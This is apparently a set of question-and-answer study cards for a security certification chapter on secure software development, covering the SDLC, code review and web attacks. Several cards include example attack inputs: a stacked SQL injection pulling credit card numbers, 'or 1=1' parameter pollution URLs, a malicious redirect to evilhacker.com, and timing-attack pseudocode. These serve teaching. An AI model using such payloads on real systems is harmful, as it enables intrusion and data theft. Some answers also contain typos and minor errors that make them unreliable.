Resource exhaustion. Whether intentional or accidental, systems may consume all of the memory, storage, processing time, or other resources available to them, rendering the system disabled or crippled for other uses.
By exposing code to all developers in an organization, code repositories promote code?
Reuse. Developers seeking code to perform a particular function can search the repository for existing code and reuse it rather than start from ground zero.
Pass-around reviews may involve more than one?
Reviewer, allowing reviewers with different expertise and experience to contribute. Although pass-around reviews allow more flexibility in when they occur than an over-the-shoulder review, they don't provide the same easy opportunity to learn about the code from the developer who wrote it than over-the-shoulder and pair programming offer, making documentation more important.
Improper error handling may expose to unacceptable levels of?
Risk. On the flip side of the error handling coin, overly verbose error handling routines may also present risk. If error handling routines explain too much about the inner working of code, they may allow an attacker to find a way to exploit the code. For example, a error message appearing on a French website that contains details of the SQL query used to create the web page. You don't need to speak French to understand that this could allow an attacker to determine the table structure and attempt a SQL injection attack!
Comments can also provide attackers with a?
Roadmap explaining how code works. In some cases, comments may even include critical security details that should remain secret. Developers should take steps to ensure that commented versions of their code remain secret. In the case of complied code, this is unnecessary, as the complier automatically removes comments from executable files. However, web applications that expose their code may allow remote users to view comments from production versions of the code before deployment. It's fine to leave the comments in place for archived source code as a reference for future developers—just don't leave them accessible to unknown individuals on the Internet.
Web developers can protect against cookie theft by marking cookies with the?
SECURE attribute.
If a web server simply passes the above request along to the database server, it would do this (with little reformatting for ease of viewing) which would look something like this which is
SELECT ItemName, ItemDescription, ItemPrice FROM Products WHERE ItemName LIKE '%orange%' AND ItemName LIKE '%tiger%' AND ItemName LIKE '%pillow%' ; SELECT CustomerName, CreditCardNumber FROM Order; --%' The command above, if successful would run two different SQL quieres (separated by the semicolon). The first would retrieve the product information and the second would retrieve a listing of customer names and credit card numbers.
When we design applications, we should create then in a manner that makes them resilient in the face of changing demand. We do this through the application of two related principals what are they?
Scalability Says that applications should be designed so that computing resources they require may be incrementally added to support increasing demand. Elasticity Goes a step further than scalability and says that applications should be able to automatically provision resources to scale when necessary and then automatically deprovision those resources to reduce capacity (and cost) when it is no longer needed.
Secure software development life cycles include incorporating?
Security concerns at every stage of the software development process.
Building, deploying, and maintaining software requires?
Security involvement throughout the software's' life cycle.
A broad variety of manual and automatic testing tools and methods are available to?
Security professionals and developers. Fortunately, automated tools have continued to improve, providing an easier way to verify that code is more secure.
Race conditions occur when the security of a code segment depends upon the?
Sequence of events occurring within the system.
The cookie contains an authentication string that ties the cookie to a particular user?
Sessions. If you inspect the contents of your own browser's cookie cheche, you'll likely find hundreds or thousands of cookies maintained by the websites that you've visited. Some cookies may be years old.
Code reuse libraries consist of?
Shared code objects that perform related functions. For example, a software library might contain a series of functions related to biology research, financial analysis, or social media. Instead of having to write the code to perform every detailed function they need, developers can simply locate libraries that contain relevant functions and then call those functions.
Attacks without access to the driver source code can use a technique called?
Shimming. This takes a legitimate driver and wraps a malicious driver around the outside of it, The malicious driver, known as a shim, receives request from the operating system an simply passes them on to the legitimate driver so that the device functions normally. However, the driver can also carry out its malware payload in the background. Fortunately, modern operating systems all contain protections against malicious drivers. The most important of these protections is code signing. Device manufactures write drivers and then apply digital signatures to them so that the operating system can verify their authenticity. If the driver is not digitally signed, the operating system may warn the user of the suspicious driver or prevent its installation outright. The privileged nature of drivers gives them deep access to the operating system. Security professions must ensure that the drivers used in their organization as legitimate and were not modified to carry out malicious activities.
Know how to analyze the indicators associated with application attacks?
Software applications may suffer from a wide range of vulnerabilities that make them susceptible to attack. You should be familiar with these attacks, including privilege escalation, cross-site scripting, injection attacks, request forgery attacks, and many other ways that attackers can exploit application code. Understanding the methods behind these attacks helps security professionals build adequate defenses and identify attacks against their organization.
Organizations trying to make libraries more accessible to developers often publish?
Software development kits (SDKs) SDKs are collections of software libraries combined with documentation, examples, and other resources designed to help programmer get up and running quickly in a development environment. SDKs also often include specialized utilities designed to help developers design and test code.
Summary for chapter 6 review this.
Software plays an integral role in every organization, performing task ranging from financial transactions to the management of sensitive physical infrastructure components. Cybersecurity professions must ensure that the software used in their environment undergoes rigorous testing to ensure that it meets business requirements and does not expose the organizations to serious cybersecurity threats. Achieving this goal requires a strong understanding of the different types of vulnerabilities that may arise in source code and in the deployment of client-server and web applications. In this chapter, you learned about many of these vulnerabilities and the tools used to manage software security risks.
Be able to understand secure software and development concepts?
Software should be created using standardized software development life cycle that moves software through development, test, staging, and production environments. Developers should understand the issue associated with code reuse and software diversity. Web applications should be developed in alignment with industry-standard principals such as those developed by the Open Web Application Security Project (OWASP).
Work is typically broken up into short working sessions, called?
Sprints, that can last days to a few weeks. When developers and customers agree that the task is done or when the time allocated for the sprints is complete, the development effort is completed.
Code repositories are centralized locations for the?
Storage and management of application source code.
The main purpose of a code repository is to?
Store the source files used in software development in a centralized location that allows for secure storage and the coordination of changes among multiple developers.
Fagan inspection is a form of?
Structured, formal code review intended to find a variety of problems during the development process. Fagan inspection specifies entry and exit criteria for processes, ensuring that a process is not started before appropriate diligence has been performed, and also making sure that there are known criteria for moving to the next phase.
APIs are tremendously useful for building interfaces between?
Systems, but they can also be a point of vulnerability if they are not properly secured.
Privilege escalation attacks seek to increase the level of access that an attacker has to a?
Target system. They exploit vulnerabilities that allow the transformation of a normal user account into a more privileged account, such as the root superuser account. In October 2016, security researchers announced the discovery of a Linux kernel vulnerability dubbed Dirty COW. This vulnerability, present in the Linux kernel for nine years, was extremely easy to exploit and provided successful attackers with administrative control of affected systems.
Cookies sever as a key to bypass?
The authentication mechanisms of a website. To draw a parallel imagine attending a trade conference. When you arrive at the registration booth, you might be asked to provide photo identification a pay a registration fee. In this case you go through an authentication process. After you register, the booth attendant hands you a badge that you wear around your neck for the remainder of the show. From that point forward, any security staff can simply glance at your badge and know that you've already been authenticated and granted access to the show. If someone steals your badge, they now have the same show access that you enjoyed.
Static code analysis (sometimes called source code analysis) is conducted by reviewing?
The code for an application. Since static analysis uses the source code for an application, it can be seen as a type of white-box testing with full visibility to the testers. This can allow testers to find problems that other tests might miss, either because the logic is not exposed to other testing methods or because of internal business logic problems.
Many organizations use multiple environments for their software and systems development and testing. The names and specific purposes for these systems vary depending on organizational needs, but the most common environments are?
The development environment is typically used for developers or other "builders" to do their work. Some workflows provide each developer with their own development environment; other use a shard development environment. The test environment is where the software or systems can be tested without impacting the production environment. In some schemes, this is production, whereas in others a separate production staging environment is used. Quality assurance (QA) activities take place in the test environment. The staging environment is a transition environment for code that has successfully cleared testing and is waiting to be deployed into production. The production environment is the live system. Software, patches, and other changes that have been tested and approved move to production Change management processes ware typically followed to move through these environments. This provides accountability and oversight and may be required for audit or compliance purposes as well.
Some web servers suffer from a security misconfiguration that allows users to navigate?
The directory structure and access files that should remain secure.
Regardless of which SDLC or process is chosen by your organization, a few phases appear in most SDLC model what are they?
The feasibility phase is where initial investigations into whether the effort should occur are conducted. Feasibility also looks at alternative solutions and high-level costs for each solution proposed. It results in a recommendation with a plan to move forward. Once an effort has been deemed feasible, it will typically go through an analysis and requirements definition phase. In this phase customer input is sought to determine what the desired functionality is, what the current system or application currently does and what is does not do, and what improvements are desired. Requirements may be ranked to determine which are most critical to the success of the project. The design phase includes design for functionality, architecture, integration points, and techniques, dataflows, business processes, and any other elements that require design consideration. The actual coding of the application occurs during the development phase. This phase may involve testing of parts of software, including unit testing, the testing of small components individually to ensure they function properly. Although some testing is likely to occur in the development phase, formal testing with customers or others outside the development team occurs in the testing and integration phase. Individual unites or software components are integrated and then tested to ensure proper functionality. In addition, connections to outside services, data sources, and other integration may occur during this phase. During this phase user acceptance training (UAT) occurs to ensure that the users of the software are satisfied with its functionality. The important task of ensuring that the end users are trained on the software and that the software has entered general use occurs in the training and transition phase. This phase is sometimes called the acceptance, installation, and development phase. Once a project reaches completion, the application or service will enter what is usually the longest phase: ongoing operations and maintenance. This phase includes patching, updating, minor modifications, and other work that goes into daily support. The disposition phase occurs when a product or system reaches the end of its life. Although disposition is often ignored in the excitement of developing new products, it is an important phase for a number of reasons: shutting down old products can produce cost savings, replacing existing tools may require specific knowledge or additional effort, and data and systems may need to be preserved or properly disposed of. The order of the phases may vary, with some progressing in a simple linear fashion and others taking an interactive or parallel approach. You will still see some form of each of these phases in successful software lifecycles.
Applications, like servers and networks, rely on authentication mechanisms to confirm?
The identity of users and devices and verify that they are authorized to perform specific actions.
Directory traversal attackers works when web servers allow?
The inclusion of operators that navigate directory paths and filesystems access controls don't properly restrict access to files stored elsewhere on the sever. For example, consider Apache web server that stores content in the directory path /var/www/html. That same server might store the shadow password file, which contains hashed user passwords, in the /etc directory using the filename /etc/shadow. Both of these locations are linked through the same directory structure. If the Apache server uses /var/www/html/ as the root location for the website this is the assumed path for all the files unless other specified. For example, if the stie were www.mycompany.com the URL www.mycompany.com/account.php would refer to the file /var/www/html/account.php stored on the sever.
The spiral model uses?
The linear development concepts from the Waterfall model and adds an interactive process that revisits four phases multiple times during the development life cycle to gather more detailed requirements, design functionality guided by the requirements, and build based on the design. In addition, the Spiral model puts significant emphasis on risk assessment as part of the SDLC, review risks multiple times during the development process.
When preforming input validation developers must be mindful of?
The types of legitimate input that may appear in a field. For example, completely disallowing the use of a single quote may be useful in protecting against SQL injection attacks, but it may also make it difficult to enter last names that include apostrophes such as O'Brien.
Now that you have a good understanding of secure code deployment and testing practices, let's tur our attention to the motivating force behind putting these mechanisms in place which are?
The vulnerabilities that attackers may exploit to undermine our security.
Many organizations reuse code not only internally but buy making use of?
Third-party software libraries and software development kits (SDKs). Third-party software libraries are a common way to share code among developers.
The roles of security practitioners in a DevSecOps model includes?
Threat analysis and communications, planning, testing, providing feedback, and of course ongoing improvement and awareness responsibilities. To do this requires a strong understanding of the organizations risk tolerance, as well as awareness of what the other involved in the DevSecOps environment are doing and when they are doing it.
An application that immediately returns the result above is probably not vulnerable to?
Timing-based attacks. However, if the application returns the result after a 15-second delay, it is likely vulnerable. This might seem like a strange attack, but it can actually be used to extract information from the database. For example, imagine that the Accounts database table used in the previous example contains an unencrypted field named Password. An attacker could use a timing-based attack to discover the password by checking it letter by letter. The SQL to perform a timing-based attack is a little complex and you won't need to know it for the exam. Instead, here's some pseudocode that illustrates how the atta ck works conceptually which might look something like this: For each character in the password For each letter in the alphabet If the current character is equal to the current letter, wait 15 seconds before returning the results In this manner, an attacker can cycle through all the possible password combinations to ferret out the password character by character. This may seem tedious, but security tools like SQL map and Metasploit automate blind timing-based attacks, making them quite straightforward.
Although many vulnerabilities affecting applications are a significant security concern for many cybersecurity professionals, the good news is that there a number of?
Tools available to assist in the development of defense-in-depth approach to security. Though a combination of secure coding practices and security infrastructure tools, cybersecurity professionals can build robust defenses against application exploits.
Tool-assisted code reviews rely on formal or informal software-based?
Tools to conduct code reviews. Tools like Atlassian's Crucible collaborative code review tool, Codacy's static code review tool, and Phabricator's Differential code review tool are all designed to improve the code review process. The wide variety of tools used for code review reflects not only the multitude of software development life cycle options but also how organizations set up their design and review processes.
A web application could send a user to a thank you page at the conclusion of a?
Transaction. This type of approach is convenient for web developers because it allows administrators to modify the destination page without altering the application code.
Cross-site request forgery attacks, abbreviated as XSRF or CSRF attacks, are similar to cross-site scripting attacks but exploit a different?
Trust relationship.
Request forgery attacks exploit?
Trust relationships and attempt to have users unwittingly execute commands against a remote server.
XSS attacks exploit the?
Trust that a user has in a website to execute code on the user's computer.
XSRF attacks exploit the?
Trust that remote sites have in a user's system to execute commands on the user's behalf.
If not properly secured, unprotected APIs may lead to the?
Unauthorized use of functions. For example, an API that does not use appropriate authentication may allow anyone with knowledge of the API URLs to modify a service.
Secure cookies are never transmitted over?
Unencrypted HTTP connections. Both servers and web browsers understand that they must only be sent over encrypted channels to protect against session replay attacks.
Developers must also anticipate?
Unexpected situations and write error handling code that steps in and handles these situations in a secure fashion.
However, if the application allows redirection to any URL, this creates a situation known as a?
Unvalidated redirect, which an attacker may use to redirect the user to a malicious site. For example an attacker might post a link to the page above a message board but alter the URL to appear as: http://www.mycompany.com/orderding.php?redirect=http%3a//www.evilhacker.com/passwordstealer.htm A user visiting the link above would complete the legitimate transaction on the my company website but then be redirected to the attacker's page, where code might send the suer straight into a session stealing or credential theft attack.
Buffer overflow attacks occur when an attacker manipulates a program into placing more data into an area of memory that is allocated for that program?
Use. The goal is to overwrite other information in memory with instructions that may be executed by a different process running on the system.
When code requires more in-depth review than relatively lightweight, Agile processes like pass-around and over-the-shoulder reviews, formal code review processes are sometimes?
Used. As you might imagine from the name, formal code reviews are in-depth, often time-consuming processes intended to fully review code using a team of experts the primary form of formal code review is Fagan inspection.
A cookie is simply a storage object maintained in the?
User's browser that holds variables that may later be accessed by the website that crated them. You can think of a cookie as a small database of information that the website maintains in the user's browser.
Developers seeking to include redirection options in their application should perform?
Validated redirects that check redirection URLs against an approved list. This list might specify the exact URLs authorized for redirection, or more simply, it might just limit redirection to URLs from the same domain.
Parameter Pollution works by sending a web application more than one?
Value for the same input variable. For example, a web application may have a variable named account that is specified in a URL like this: http://www.mycompany.com/status.php?account=12345 An attacker might try to exploit this application by injecting a SQL code into the application like this? http://www.mycompany.com/status.php?account=12345' or 1=1;-- However, the string above looks quite suspicious to a web application firewall and would likely be blocked. An attacker seeking to obscure the attack and bypass content filtering mechanisms might instead send a command with to different values like this? http://www.mycompany.com/status.php?account=12345&account=12345' or 1=1;-- This approach relies on the premise that the web platform won't handle this URL properly. It might perform input validation on only the first argument but then execute the second argument, allowing the injection attack to slip through the filtering technology.
Many websites maintain detailed catalogs of default passwords used for a wide?
Varity of applications and devices. Those sites are a great starting point for penetration testers seeking to gain access to a networked device.
The table down below compares the four informal code review methods and formal code review which specific implementations may?
Vary, but these comparisons will generally hold true between each type of code review. In addition, the theory behind each method may not always reflect the reality of how an organization will use it. For example, pair programming is intended to provide the same speed for development as two developers working on their own while increasing the quality of the code. This may be true for experienced programmers who work well together, but lack of training, personality differences, and variation in work styles can make pair programming less effective than expected.
Code repositories also perform?
Version control, allowing the tacking of changes and the rollback of the code to earlier versions when required. Basically, code repositories perform the housekeeping work of software development, making it possible for many people to share work on a large software project in an organized fashion. They also meet the needs of security and auditing professionals who want to ensure that software development includes automated auditing and logging of changes.
In a content based blind SQL injection attack, the perpetrator sends input to the?
Web application that tests whether the application is interpreting injected code before attempting to carry out an attack. For example, consider a web application that asks a user to enter an account number.
Web application firewalls (WAFs) also play an important role in protecting?
Web applications against attacks. Though developers should always rely on input validation as their primary defense against injection attacks, the reality is that applications still sometimes contain injection flaws. This can occur when developer testing is insufficient or when vendors do not promptly supply patches to vulnerable applications.
Developers should protect their web applications against XSRF attacks one way to do this is to create?
Web applications that use secure tokens that the attacker would not know to embed in links. Another safeguard is for sites to check the referring URL in requests received from end users and only accept requests that originated form their own site.
A malicious individual could create a new?
Web page with a link titled "Check your account at First Bank" and encode form input in the link. When the user visits the link, the web page appears to an authentic First Bank website (because it is!) with the proper address in the toolbar and a valid digital certificate. However, the website would then execute the script included in the input by the malicious user, which appears to be part of the valid web page.
Parameter Pollution attacks depend on defects in?
Web platforms that don't handle multiple copies of the same parameter properly. These vulnerabilities have been around for a while, and most modern planforms are defended against them, but successful parameter pollution attacks still occur today due to unpatched systems or insecure custom code.
One particular issue that might arise if the pointer is empty is that it contains?
What programmers call a null value.
What the answer to cross site scripting?
When creating web applications that allow any type of user input, developers must be sure to perform input validation. At the most basic level, applications should never allow a user to include the SCRIPT tag in a reflected input field. However, this does not solve the problem completely, there are many clever alternatives available to an industrious web application attacker, The best solution is to determine the type of input that the application will allow and then validate the input to ensure that it matches the patter. For example, if an application has a text box that allows users to enter their age, it should accept only one to three digits as input. The application should reject any other input as invalid.
Comments are an important part of any good developers?
Workflow. Placed strategically throughout code, they provide documentation of design choices, explain workflows, and offer details crucial to other developers who may later be called on to modify or troubleshoot the code. When placed in the right hands, comments are crucial.
The process of designing, creating, supporting, and maintaining that software is known as?
the software development life cycle (SDLC). As a security practitioner, you need to understand the SDLC and it security implications to ensure that the software that your organization uses is well written and secure throughout its lifespan.